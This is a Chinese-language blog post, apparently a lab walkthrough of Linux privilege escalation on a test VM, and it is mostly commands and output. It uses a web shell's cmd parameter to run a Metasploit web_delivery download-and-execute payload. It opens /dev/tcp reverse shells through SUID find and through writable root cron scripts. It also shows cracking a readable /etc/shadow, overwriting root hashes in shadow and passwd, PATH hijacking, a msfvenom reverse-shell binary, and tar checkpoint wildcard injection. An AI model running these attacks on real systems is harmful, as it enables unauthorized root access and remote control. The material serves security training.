<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="云逸'bolg" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="云逸'bolg" type="application/atom+xml"><link rel="alternate" type="application/json" title="云逸'bolg" href="http://gyzero.shop/feed.json"/><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/><link rel="dns-prefetch" href="https://unpkg.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext"><link rel="stylesheet" href="/css/app.css?v=0.3.6"><script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.js"></script><link rel="canonical" href="http://gyzero.shop/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/"><title>linux提权</title><meta name="generator" content="Hexo 6.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">linux提权</h1><div class="meta"><span class="item" title="创建时间：2023-11-10 17:52:23"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2023-11-10T17:52:23+08:00">2023-11-10</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>18k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>17 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">云逸'bolg</a></li></ul><ul class="right" id="rightNav"><li class="item theme" @click="changeThemeByBtn"><i class="ic" :class="{'i-sun': !themeStatus,'i-moon': themeStatus}"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/kkk.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/9998.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/zzz.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/%E5%A3%81%E7%BA%B8/45.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/00.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/99.jpg"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/network-security/" itemprop="item" rel="index" title="分类于网络安全"><span itemprop="name">网络安全<meta itemprop="position" content="0"/></span></a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/network-security/neiwang/" itemprop="item" rel="index" title="分类于内网安全"><span itemprop="name">内网安全<meta itemprop="position" content="1"/></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="http://gyzero.shop/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"/><meta itemprop="name" content="云逸"/><meta itemprop="description" content=", "/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="云逸'bolg"/></span><div class="body md" itemprop="articleBody"><h3 id="信息收集命令"><a class="markdownIt-Anchor" href="#信息收集命令">#</a> 信息收集命令</h3>
<h4 id="系统信息"><a class="markdownIt-Anchor" href="#系统信息">#</a> 系统信息</h4>
<ul>
<li><strong> <code>uname -a</code> </strong>: 显示内核、操作系统和 CPU 信息。</li>
<li><strong> <code>head -n 1 /etc/issue</code> </strong>: 显示操作系统版本。</li>
<li><strong> <code>cat /proc/version</code> </strong>: 显示系统信息。</li>
<li><strong> <code>hostname</code> </strong>: 显示计算机名。</li>
<li><strong> <code>env</code> </strong>: 显示环境变量。</li>
</ul>
<h4 id="网络信息"><a class="markdownIt-Anchor" href="#网络信息">#</a> 网络信息</h4>
<ul>
<li><strong> <code>ifconfig</code> </strong>: 显示网络接口信息（现在更常用的是 <code>ip addr show</code> ）。</li>
<li><strong> <code>netstat -lntp</code> </strong>: 显示所有监听端口。</li>
<li><strong> <code>netstat -antp</code> </strong>: 显示所有已建立的连接。</li>
<li><strong> <code>netstat -s</code> </strong>: 显示网络统计信息。</li>
<li><strong> <code>iptables -L</code> </strong>: 显示防火墙设置。</li>
<li><strong> <code>route -n</code> </strong>: 显示路由表。</li>
</ul>
<h4 id="用户组信息系统服务"><a class="markdownIt-Anchor" href="#用户组信息系统服务">#</a> 用户组信息系统服务</h4>
<ul>
<li><strong> <code>w</code> </strong>：显示活动用户和他们正在使用的终端等信息。</li>
<li><strong> <code>id [username]</code> </strong>：显示指定用户的信息，包括用户 ID（UID）、所属用户组等。</li>
<li><strong> <code>last</code> </strong>：显示用户登录的历史记录，包括登录时间和来源。</li>
<li><strong> <code>cut -d: -f1 /etc/passwd</code> </strong>：显示系统上所有用户的用户名。</li>
<li><strong> <code>cut -d: -f1 /etc/group</code> </strong>：显示系统上所有组的组名。</li>
<li><strong> <code>crontab -l</code> </strong>：显示当前用户的计划任务（定时任务）。</li>
<li><strong> <code>chkconfig --list</code> </strong>：列出所有系统服务。</li>
<li><strong> <code>chkconfig --list | grep on</code> </strong>：列出所有已启动的系统服务。</li>
<li><strong> <code>echo $PATH</code> </strong>：显示系统的路径列表，用冒号分隔的目录列表表示系统在搜索可执行文件时的顺序。</li>
</ul>
<h4 id="信息收集"><a class="markdownIt-Anchor" href="#信息收集">#</a> 信息收集</h4>
<p><code>nmap -sT 192.168.244.0/24</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121190515553.png" alt=""></p>
<p>访问 80 没啥东西扫一下目录</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121190852090.png" alt="image-20231121190852090"></p>
<p>扫到一个 shell.php</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121191144694.png" alt="image-20231121191144694"></p>
<h4 id="反弹shell"><a class="markdownIt-Anchor" href="#反弹shell">#</a> 反弹 shell</h4>
<p>参数是 cmd 可以执行命令</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121191211218.png" alt="image-20231121191211218"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121191300474.png" alt="image-20231121191300474"></p>
<p><code>msf script/web_delivery模块 反弹shell</code></p>
<p><code>use exploit/multi/script/web_delivery </code></p>
<p><code>set lhost 192.168.244.128</code></p>
<p><code>set lport 9000</code></p>
<p><code>run</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121191557311.png" alt="image-20231121191557311"></p>
<p>复制 payload 并且 url 编码添加在 cmd 参数后面执行得到 shell</p>
<p><code>python%20-c%20%22import%20sys%3Bimport%20ssl%3Bu%3D__import__('urllib'%2B%7B2%3A''%2C3%3A'.request'%7D%5Bsys.version_info%5B0%5D%5D%2Cfromlist%3D('urlopen'%2C))%3Br%3Du.urlopen('http%3A%2F%2F192.168.244.128%3A8080%2FsZTvRL2bM'%2C%20context%3Dssl._create_unverified_context())%3Bexec(r.read())%3B%22</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121191810361.png" alt="image-20231121191810361"></p>
<h4 id="主机信息收集"><a class="markdownIt-Anchor" href="#主机信息收集">#</a> 主机信息收集</h4>
<p>先拿一个交互 shell</p>
<p><code>**python -c 'import pty;pty.spawn(&quot;/bin/bash&quot;)'**</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20231121192112964.png" alt="image-20231121192112964"></p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tr><td data-num="1"></td><td><pre>显示内核、操作系统和CPU信息</pre></td></tr><tr><td data-num="2"></td><td><pre>Linux osboxes <span class="token number">4.15</span><span class="token number">.0</span><span class="token operator">-</span><span class="token number">45</span><span class="token operator">-</span>generic <span class="token comment">#48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux</span></pre></td></tr><tr><td data-num="3"></td><td><pre>操作系统版本</pre></td></tr><tr><td data-num="4"></td><td><pre>Linux Lite <span class="token number">4.4</span> LTS \n \l</pre></td></tr><tr><td data-num="5"></td><td><pre>显示系统信息</pre></td></tr><tr><td data-num="6"></td><td><pre>Linux version <span class="token number">4.15</span><span class="token number">.0</span><span class="token operator">-</span><span class="token number">45</span><span class="token operator">-</span>generic <span class="token punctuation">(</span>buildd@lgw01<span class="token operator">-</span>amd64<span class="token operator">-</span><span class="token number">031</span><span class="token punctuation">)</span> <span class="token punctuation">(</span>gcc version <span class="token number">7.3</span><span class="token number">.0</span> <span class="token punctuation">(</span>Ubuntu <span class="token number">7.3</span><span class="token number">.0</span><span class="token operator">-</span>16ubuntu3<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment">#48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019</span></pre></td></tr><tr><td data-num="7"></td><td><pre>环境变量</pre></td></tr><tr><td data-num="8"></td><td><pre>env</pre></td></tr><tr><td data-num="9"></td><td><pre>APACHE_LOG_DIR<span class="token operator">=</span><span class="token operator">/</span>var<span class="token operator">/</span>log<span class="token operator">/</span>apache2</pre></td></tr><tr><td data-num="10"></td><td><pre>LANG<span class="token operator">=</span>C</pre></td></tr><tr><td data-num="11"></td><td><pre>INVOCATION_ID<span class="token operator">=</span>15ecc432bc2940368927675d4ac3a3a3</pre></td></tr><tr><td data-num="12"></td><td><pre>APACHE_LOCK_DIR<span class="token operator">=</span><span class="token operator">/</span>var<span class="token operator">/</span>lock<span class="token operator">/</span>apache2</pre></td></tr><tr><td data-num="13"></td><td><pre>PWD<span class="token operator">=</span><span class="token operator">/</span>var<span class="token operator">/</span>www<span class="token operator">/</span>html</pre></td></tr><tr><td data-num="14"></td><td><pre>JOURNAL_STREAM<span class="token operator">=</span><span class="token number">9</span><span class="token punctuation">:</span><span class="token number">21980</span></pre></td></tr><tr><td data-num="15"></td><td><pre>APACHE_RUN_GROUP<span class="token operator">=</span>user6</pre></td></tr><tr><td data-num="16"></td><td><pre>APACHE_RUN_DIR<span class="token operator">=</span><span class="token operator">/</span>var<span class="token operator">/</span>run<span class="token operator">/</span>apache2</pre></td></tr><tr><td data-num="17"></td><td><pre>APACHE_RUN_USER<span class="token operator">=</span>user6</pre></td></tr><tr><td data-num="18"></td><td><pre>APACHE_PID_FILE<span class="token operator">=</span><span class="token operator">/</span>var<span class="token operator">/</span>run<span class="token operator">/</span>apache2<span class="token operator">/</span>apache2<span class="token punctuation">.</span>pid</pre></td></tr><tr><td data-num="19"></td><td><pre>SHLVL<span class="token operator">=</span><span class="token number">1</span></pre></td></tr><tr><td data-num="20"></td><td><pre>PATH<span class="token operator">=</span><span class="token operator">/</span>usr<span class="token operator">/</span>local<span class="token operator">/</span>sbin<span class="token punctuation">:</span><span class="token operator">/</span>usr<span class="token operator">/</span>local<span class="token operator">/</span><span class="token builtin">bin</span><span class="token punctuation">:</span><span class="token operator">/</span>usr<span class="token operator">/</span>sbin<span class="token punctuation">:</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token builtin">bin</span><span class="token punctuation">:</span><span class="token operator">/</span>sbin<span class="token punctuation">:</span><span class="token operator">/</span><span class="token builtin">bin</span></pre></td></tr><tr><td data-num="21"></td><td><pre>_<span class="token operator">=</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token builtin">bin</span><span class="token operator">/</span>env</pre></td></tr><tr><td data-num="22"></td><td><pre>计算机名</pre></td></tr><tr><td data-num="23"></td><td><pre>osboxes</pre></td></tr><tr><td data-num="24"></td><td><pre>系统路径列表</pre></td></tr><tr><td data-num="25"></td><td><pre><span class="token operator">/</span>usr<span class="token operator">/</span>local<span class="token operator">/</span>sbin<span class="token punctuation">:</span><span class="token operator">/</span>usr<span class="token operator">/</span>local<span class="token operator">/</span><span class="token builtin">bin</span><span class="token punctuation">:</span><span class="token operator">/</span>usr<span class="token operator">/</span>sbin<span class="token punctuation">:</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token builtin">bin</span><span class="token punctuation">:</span><span class="token operator">/</span>sbin<span class="token punctuation">:</span><span class="token operator">/</span><span class="token builtin">bin</span></pre></td></tr><tr><td data-num="26"></td><td><pre>开启的服务</pre></td></tr><tr><td data-num="27"></td><td><pre>mysql 开启</pre></td></tr><tr><td data-num="28"></td><td><pre>用户</pre></td></tr><tr><td data-num="29"></td><td><pre>vboxadd</pre></td></tr><tr><td data-num="30"></td><td><pre>user1</pre></td></tr><tr><td data-num="31"></td><td><pre>user2</pre></td></tr><tr><td data-num="32"></td><td><pre>user3</pre></td></tr><tr><td data-num="33"></td><td><pre>user4</pre></td></tr><tr><td data-num="34"></td><td><pre>statd</pre></td></tr><tr><td data-num="35"></td><td><pre>user5</pre></td></tr><tr><td data-num="36"></td><td><pre>user6</pre></td></tr><tr><td data-num="37"></td><td><pre>mysql</pre></td></tr><tr><td data-num="38"></td><td><pre>user7</pre></td></tr><tr><td data-num="39"></td><td><pre>user8</pre></td></tr></table></figure><h4 id="suid提权"><a class="markdownIt-Anchor" href="#suid提权">#</a> SUID 提权</h4>
<p>SUID（Set User ID）是一种权限设置，允许用户以文件所有者的权限来执行文件，即使用户自身的权限可能不足以执行该文件。</p>
<p>在 Unix 或类 Unix 系统中，当一个可执行文件的 SUID 位被设置为 1 时，无论谁执行该文件，都会以该文件的所有者身份执行。这种权限设置通常用于系统文件或程序，以便允许普通用户执行特定的任务或命令，而无需暴露超出其权限范围的访问权限。</p>
<p><code>find / -perm -u=s -type f 2&gt;/dev/null find / -user root -perm -4000-print2&gt;/dev/null find / -user root -perm -4000-exec ls -ldb &#123;&#125; \;</code></p>
<p>在 Unix 或 Linux 系统中查找具有 SUID 权限设置的文件。它会搜索整个文件系统 (“/”)，找到具有 SUID 权限设置的文件 (“-perm  -u=s”) 并将它们显示出来。同时，将任何错误消息重定向到 /dev/null，以避免它们显示在屏幕上。</p>
<p>常见的提权文件</p>
<p><code>nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget</code></p>
<p>查询到有一个 find</p>
<p>cd /  cd /tmp 到 tmp 目录</p>
<p>创建一个文件</p>
<p>touch 1234</p>
<p>find 1234 -exec whoami ;</p>
<p>这个命令的作用是在当前目录下搜索名为 “1234” 的文件或目录，并对找到的每一个执行  <code>whoami</code>  命令。</p>
<p><code>find</code>  命令用于查找文件和目录， <code>-exec</code>  选项允许在找到的每一个项目上执行特定的命令， <code>\;</code>  表示命令结束。</p>
<p>如果在当前目录下存在名为 “1234” 的文件或目录，对于每一个找到的 “1234”， <code>whoami</code>  命令将被执行，显示当前执行命令的用户的用户名。</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240207132333459.png" alt="image-20240207132333459"></p>
<p>反弹 shell</p>
<p><code>find /etc/passwd -exec bash -ip &gt;&amp; /dev/tcp/192.168.244.128/4343 0&gt;&amp;1 \;</code></p>
<p>nc 开启监听接收到会话</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240207132540518.png" alt="image-20240207132540518"></p>
<h3 id="可读shadow文件利用"><a class="markdownIt-Anchor" href="#可读shadow文件利用">#</a> 可读 shadow 文件利用</h3>
<p>Shadow 文件的概述:</p>
<p>Shadow 文件是一个 Linux 系统中存储加密用户密码和其他身份信息，如账号过期时间，密码过期时间，账户锁定和密码最小长度等等的重要文件。</p>
<p>Shadow 文件位于 /etc/shadow ，只有 root 用户有权限访问它。</p>
<p>shadow 文件与 passwd 文件的关系：早些版本加密后的密码是保存在 passwd 文件里第二个字段的位置也就是图中 x 的位置</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221212919749.png" alt="image-20240221212919749"></p>
<p>但是呢虽然是加密的还是有可能被破解所以加上了 shadow 这个文件而 passwd 文件里的就被替换为了 X 占位，因为 shadow 文件只有 root 用户可以访问所以相对比较安全，不过有时管理员对文件权限错误配置也会导致被拿来恶意利用</p>
<p>文件格式：</p>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre>登录名:加密口令:最后一次修改时间:最小时间间隔:最大时间间隔:警告时间:不活动时间:失效时间:标志</pre></td></tr><tr><td data-num="2"></td><td><pre>root:<span class="token variable">$6</span><span class="token variable">$mqjgcFoM</span><span class="token variable">$X</span>/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::</pre></td></tr></table></figure><p>利用条件 shadow 有权查看</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221213805632.png" alt="image-20240221213805632"></p>
<p>获取 root 用户信息并保存在新建文件中</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221213918116.png" alt="image-20240221213918116"></p>
<p>root:<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>6</mn></mrow><annotation encoding="application/x-tex">6</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6444em;"></span><span class="mord">6</span></span></span></span>mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::</p>
<p>利用工具 john 来破解</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221220225042.png" alt="image-20240221220225042"></p>
<p>得到明文密码就可以切换 root 了</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221220330572.png" alt="image-20240221220330572"></p>
<h3 id="可写shadow文件利用"><a class="markdownIt-Anchor" href="#可写shadow文件利用">#</a> 可写 shadow 文件利用</h3>
<p>利用原理：把 shadow 文件里 root 用户 hash 值替换为自己生成的就可以 hash 再用生成用到的明文进行登录 root</p>
<p>前提要有 shadow 可写权限</p>
<p>通过 mkpasswd 生成哈希</p>
<p><code>mkpasswd -m sha-512 1234567</code></p>
<p><code>$6$hpRA5YNV9lAANtsF$JwX/K8VfxhxpTm5U2oTEgFw.YiYVCmfzZ0i6SqUDkpJRamWVmQ0LgflQUlhjVHkAS5N8MwFFR12mHBg6qFhwC/</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221221309745.png" alt="image-20240221221309745"></p>
<p>用 sha-512 是因为</p>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token variable">$6</span>$开头的，表明是用SHA-512加密的，密文长度86</pre></td></tr><tr><td data-num="2"></td><td><pre>      <span class="token variable">$1</span>$ 表明是用MD5加密的，密文长度22个字符</pre></td></tr><tr><td data-num="3"></td><td><pre>      <span class="token variable">$2</span>$ 是用Blowfish加密的，</pre></td></tr><tr><td data-num="4"></td><td><pre>      <span class="token variable">$5</span>$ 是用 SHA-256加密的，密文长度43</pre></td></tr></table></figure><p>接着把生成的 hash 替换原本的就可以用 1234567 登陆了</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221221617115.png" alt="image-20240221221617115"></p>
<h3 id="可写passwd文件利用"><a class="markdownIt-Anchor" href="#可写passwd文件利用">#</a> 可写 passwd 文件利用</h3>
<p>虽然 passwd 文件里 hash 被 X 替代了无法查看但是把 X 替换为我们生成的 hash 还是可以登陆的</p>
<p>利用 openssl 生成</p>
<p><code>openssl passwd 987654321</code></p>
<p><code>$1$uOZ/Tr4f$EqDyR9WU8wJNeB3tEY09f.</code></p>
<p>把 passwd 里 root 的 X 替换</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240221222616639.png" alt="image-20240221222616639"></p>
<p>即可用 987654321 切换 root</p>
<h3 id="计划任务提权"><a class="markdownIt-Anchor" href="#计划任务提权">#</a> 计划任务提权</h3>
<p>查看计划任务</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240222000243892.png" alt="image-20240222000243892"></p>
<p><code>* * * * * root    /home/crontab.sh</code></p>
<p>这条计划任务的意思是每 1 分钟执行一次 crontab.sh 脚本，并且是以 root 用户的权限来执行。</p>
<p>而这个文件我们是有权更改的那么就可以写入反弹 shell 命令</p>
<p><code>echo 'bash -c &quot;bash -i &gt;&amp; /dev/tcp/192.168.1.139/4444 0&gt;&amp;1&quot;' &gt; crontab.sh</code></p>
<p>nc 进行监听等一分钟拿 shell</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240222003928818.png" alt="image-20240222003928818"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240222005508201.png" alt="image-20240222005508201"></p>
<h3 id="计划任务环境变量提权"><a class="markdownIt-Anchor" href="#计划任务环境变量提权">#</a> 计划任务环境变量提权</h3>
<p>如果你在计划任务中没有指定程序的绝对路径，系统会在 crontab 文件中的 <code>PATH</code>  环境变量所列出的目录中查找该程序。这些目录会按照在 <code>PATH</code>  变量中的顺序被检查。如果在某个目录中找到了该程序，系统就会停止搜索并执行该程序。</p>
<p>图中每分钟执行一次 <code>shell.sh</code>  脚本但是没有指定绝对路径， <code>PATH</code>  中默认优先查找 /home/yunyi 路径下有没有 shell.sh 有的话</p>
<p>就每分钟执行，利用这个特性就可以在 <code>yunyi</code>  目录中创建一个 <code>shell.sh</code>  并写上反弹 shell 进行提权</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240223220655325.png" alt="image-20240223220655325"></p>
<p><code>#!/bin/bash</code></p>
<p><code>bash -c &quot;bash -i &gt;&amp; /dev/tcp/192.168.1.142/7676 0&gt;&amp;1&quot;</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240223220835815.png" alt="image-20240223220835815"></p>
<p>别忘了给执行权限 <code>chmod +x shell.sh</code></p>
<p><code>kali：nc -vlnp 7676</code></p>
<p>获取 shell</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240223221033086.png" alt="image-20240223221033086"></p>
<h3 id="计划任务通配符提权"><a class="markdownIt-Anchor" href="#计划任务通配符提权">#</a> 计划任务通配符提权</h3>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240223220655325.png" alt="image-20240223220655325"></p>
<p>这里还有一个 zip.sh 看一下内容是</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240223221316077.png" alt="image-20240223221316077"></p>
<p>到 home/yunyi/user 目录下打包所有文件夹文件到 /tmp 目录下名为 yunyi.tar.gz</p>
<p>利用 tar <code>命令的</code> –checkpoint <code>和</code> –checkpoint-action</p>
<p>tar <code>命令的</code> –checkpoint <code>和</code> –checkpoint-action <code>参数可以被用来执行提权操作这是因为</code>  tar` 命令在处理文件时，可以在每个检查点 checkpoint 执行一个特定的动作 action</p>
<p>如果管理员给予了某个普通用户 <code>tar</code>  命令的超级管理员操作权限，那么我们可以使用 <code>tar</code>  命令进行提权例如，以下命令可以创建一个新的归档文件，并在每个检查点执行 <code>/bin/bash</code>  命令</p>
<p><code>sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec=&quot;/bin/bash&quot;</code></p>
<p>在这个命令中， <code>--checkpoint=1</code>  表示每处理一个文件就设置一个检查点， <code>--checkpoint-action=exec=&quot;/bin/bash&quot;</code>  表示在每个检查点执行 <code>/bin/bash</code>  命令因为 <code>tar</code>  命令是以 <code>root</code>  用户的身份运行的，所以 <code>/bin/bash</code>  命令也会以 <code>root</code>  用户的身份运行，从而获得 <code>root</code>  权限</p>
<p>kali 生成反弹 shell 文件</p>
<p><code>msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.142 LPORT=8989 -f elf -o shell.elf</code></p>
<p>启动一个 http 服务受害机下载 shell 文件并给予权限</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240224132512587.png" alt="image-20240224132512587"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240224132558854.png" alt="image-20240224132558854"></p>
<p>在 user 目录创建这两个文件</p>
<p><code>touch /home/yunyi/user/--checkpoint-action=exec=shell.elf</code></p>
<p><code>touch /home/yunyi/user/--checkpoint=1</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240224133036613.png" alt="image-20240224133036613"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240224140015673.png" alt="image-20240224140015673"></p>
<p><code>nc -lvnp 8989</code>  拿到权限</p>
<p>也可以创建一个 sh 脚本反弹 shell</p>
<p><code>touch /home/yunyi/user/--checkpoint-action=exec=sh shell.sh</code></p>
<h3 id="suid原理详解"><a class="markdownIt-Anchor" href="#suid原理详解">#</a> SUID 原理详解</h3>
<h4 id="suid共享库提权"><a class="markdownIt-Anchor" href="#suid共享库提权">#</a> SUID 共享库提权</h4>
<p>其实 suid 提权原理就是利用有 s 位的程序去执行我们的恶意文件恶意命令</p>
<p>编写一个有漏洞的程序</p>
